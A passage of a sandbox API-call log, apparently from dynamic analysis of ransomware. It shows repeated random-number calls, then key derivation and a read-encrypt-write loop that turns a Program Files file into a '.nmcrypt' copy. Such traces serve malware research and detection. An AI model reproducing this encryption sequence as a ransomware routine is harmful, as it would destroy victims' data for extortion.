out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.545] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.546] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0165.547] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.547] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0165.548] CryptCreateHash (in: hProv=0x8e3b28, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447c4 | out: phHash=0x1d4447c4) returned 1 [0165.548] CryptHashData (hHash=0x9ad138, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0165.548] CryptDeriveKey (in: hProv=0x8e3b28, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d4447c8 | out: phKey=0x1d4447c8*=0x9ad5b8) returned 1 [0165.548] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0165.548] CryptSetKeyParam (hKey=0x9ad5b8, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0165.548] wcslen (_String="\\\\?\\") returned 0x4 [0165.548] CryptDuplicateKey (in: hKey=0x9ad5b8, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad3b8) returned 1 [0165.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c4 [0165.548] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15b0 [0165.549] GetFileSizeEx (in: hFile=0x15b0, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=81292) returned 1 [0165.551] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.551] GetLastError () returned 0x0 [0165.551] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.571] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.571] GetLastError () returned 0x0 [0165.571] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.571] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.571] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.572] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.572] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.572] GetLastError () returned 0x0 [0165.572] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0165.573] ReadFile (in: hFile=0x15b0, lpBuffer=0x2891f68, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2891f68*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0165.573] CryptEncrypt (in: hKey=0x9ad3b8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x1d467dd0*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0165.573] GetLastError () returned 0x0 [0165.573] WriteFile (in: hFile=0x15c4, lpBuffer=0x1d467dd0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d467dd0*, 